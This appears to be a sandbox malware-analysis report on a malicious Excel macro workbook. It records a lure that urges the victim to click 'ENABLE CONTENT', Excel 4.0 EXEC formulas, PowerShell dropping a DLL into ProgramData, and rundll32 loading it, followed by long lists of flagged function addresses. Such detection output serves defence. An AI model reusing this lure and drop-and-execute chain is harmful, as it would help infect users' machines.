Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
Document contains OLE streams with names of living off the land binaries
Source: NZW-010122 BNUV-280122.xlsm Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
Source: NZW-010122 BNUV-280122.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: NZW-010122 BNUV-280122.xlsm Initial sample: EXEC
Source: NZW-010122 BNUV-280122.xlsm Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DF8FD 9_2_002DF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DE991 9_2_002DE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DAB87 9_2_002DAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0001 9_2_002E0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9011 9_2_002D9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E907F 9_2_002E907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F0056 9_2_002F0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D2051 9_2_002D2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E20BA 9_2_002E20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D70B3 9_2_002D70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DF09B 9_2_002DF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E4116 9_2_002E4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D51BB 9_2_002D51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D81B7 9_2_002D81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D2251 9_2_002D2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EA2E8 9_2_002EA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DE2CC 9_2_002DE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DB2C7 9_2_002DB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D5361 9_2_002D5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4346 9_2_002D4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F13AD 9_2_002F13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EC3A0 9_2_002EC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002ED389 9_2_002ED389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EE395 9_2_002EE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EF435 9_2_002EF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E044F 9_2_002E044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D64E2 9_2_002D64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E8519 9_2_002E8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D5548 9_2_002D5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DA55F 9_2_002DA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E2550 9_2_002E2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E95FA 9_2_002E95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DE5CF 9_2_002DE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EC631 9_2_002EC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E8606 9_2_002E8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EA666 9_2_002EA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E66CA 9_2_002E66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DD6D8 9_2_002DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E473C 9_2_002E473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D7735 9_2_002D7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9714 9_2_002D9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E176B 9_2_002E176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DB74D 9_2_002DB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4816 9_2_002D4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E1889 9_2_002E1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D8969 9_2_002D8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E894B 9_2_002E894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F09B5 9_2_002F09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D59F2 9_2_002D59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EAA30 9_2_002EAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D1A56 9_2_002D1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DEA99 9_2_002DEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EBB23 9_2_002EBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D8B3D 9_2_002D8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0B19 9_2_002E0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DBB7E 9_2_002DBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002ECB5B 9_2_002ECB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E7BA6 9_2_002E7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E4B87 9_2_002E4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9B83 9_2_002D9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EDBEA 9_2_002EDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E8BE3 9_2_002E8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E9BCF 9_2_002E9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D2BD9 9_2_002D2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D3C3C 9_2_002D3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EAC3A 9_2_002EAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D7C37 9_2_002D7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F0C14 9_2_002F0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E6C49 9_2_002E6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4C5D 9_2_002D4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EDCF7 9_2_002EDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E5CC4 9_2_002E5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D6D24 9_2_002D6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E6DF8 9_2_002E6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9DCF 9_2_002D9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E7DD5 9_2_002E7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EBE27 9_2_002EBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D3E3F 9_2_002D3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F0E3A 9_2_002F0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EAE6D 9_2_002EAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D5E60 9_2_002D5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0E53 9_2_002E0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DEE81 9_2_002DEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E9EEC 9_2_002E9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4EE3 9_2_002D4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DAEFB 9_2_002DAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002EDEDC 9_2_002EDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F0F33 9_2_002F0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DCF47 9_2_002DCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DDFF3 9_2_002DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D7FF2 9_2_002D7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00303C3C 10_2_00303C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309011 10_2_00309011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031044F 10_2_0031044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003120BA 10_2_003120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030F8FD 10_2_0030F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030D6D8 10_2_0030D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314116 10_2_00314116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003213AD 10_2_003213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030AB87 10_2_0030AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00307FF2 10_2_00307FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003059F2 10_2_003059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003195FA 10_2_003195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031C631 10_2_0031C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031AA30 10_2_0031AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031F435 10_2_0031F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00307C37 10_2_00307C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00320E3A 10_2_00320E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031AC3A 10_2_0031AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00303E3F 10_2_00303E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031BE27 10_2_0031BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00304816 10_2_00304816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00320C14 10_2_00320C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00310001 10_2_00310001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00318606 10_2_00318606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031907F 10_2_0031907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00305E60 10_2_00305E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031A666 10_2_0031A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031AE6D 10_2_0031AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00302051 10_2_00302051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00302251 10_2_00302251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00310E53 10_2_00310E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00320056 10_2_00320056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00301A56 10_2_00301A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00304C5D 10_2_00304C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00316C49 10_2_00316C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003070B3 10_2_003070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030EA99 10_2_0030EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030F09B 10_2_0030F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030EE81 10_2_0030EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00311889 10_2_00311889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031DCF7 10_2_0031DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030AEFB 10_2_0030AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003064E2 10_2_003064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00304EE3 10_2_00304EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031A2E8 10_2_0031A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00319EEC 10_2_00319EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031DEDC 10_2_0031DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00315CC4 10_2_00315CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030B2C7 10_2_0030B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003166CA 10_2_003166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030E2CC 10_2_0030E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00320F33 10_2_00320F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00307735 10_2_00307735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031473C 10_2_0031473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00308B3D 10_2_00308B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031BB23 10_2_0031BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00306D24 10_2_00306D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309714 10_2_00309714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00318519 10_2_00318519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00310B19 10_2_00310B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030BB7E 10_2_0030BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00305361 10_2_00305361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00308969 10_2_00308969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031176B 10_2_0031176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00312550 10_2_00312550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031CB5B 10_2_0031CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030A55F 10_2_0030A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00304346 10_2_00304346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030CF47 10_2_0030CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00305548 10_2_00305548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031894B 10_2_0031894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030B74D 10_2_0030B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003209B5 10_2_003209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003081B7 10_2_003081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003051BB 10_2_003051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031C3A0 10_2_0031C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00317BA6 10_2_00317BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030E991 10_2_0030E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031E395 10_2_0031E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309B83 10_2_00309B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314B87 10_2_00314B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031D389 10_2_0031D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030DFF3 10_2_0030DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00316DF8 10_2_00316DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00318BE3 10_2_00318BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0031DBEA 10_2_0031DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00317DD5 10_2_00317DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00302BD9 10_2_00302BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00319BCF 10_2_00319BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309DCF 10_2_00309DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0030E5CF 10_2_0030E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077F8FD 11_2_0077F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077E991 11_2_0077E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077AB87 11_2_0077AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078907F 11_2_0078907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00772051 11_2_00772051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00790056 11_2_00790056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00779011 11_2_00779011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00780001 11_2_00780001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007820BA 11_2_007820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007770B3 11_2_007770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077F09B 11_2_0077F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00784116 11_2_00784116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007781B7 11_2_007781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007751BB 11_2_007751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00772251 11_2_00772251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078A2E8 11_2_0078A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077B2C7 11_2_0077B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077E2CC 11_2_0077E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00775361 11_2_00775361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00774346 11_2_00774346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007913AD 11_2_007913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078C3A0 11_2_0078C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078E395 11_2_0078E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078D389 11_2_0078D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078044F 11_2_0078044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0078F435 11_2_0078F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_007764E2 11_2_007764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0077A55F 11_2_0077A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00782550 11_2_00782550
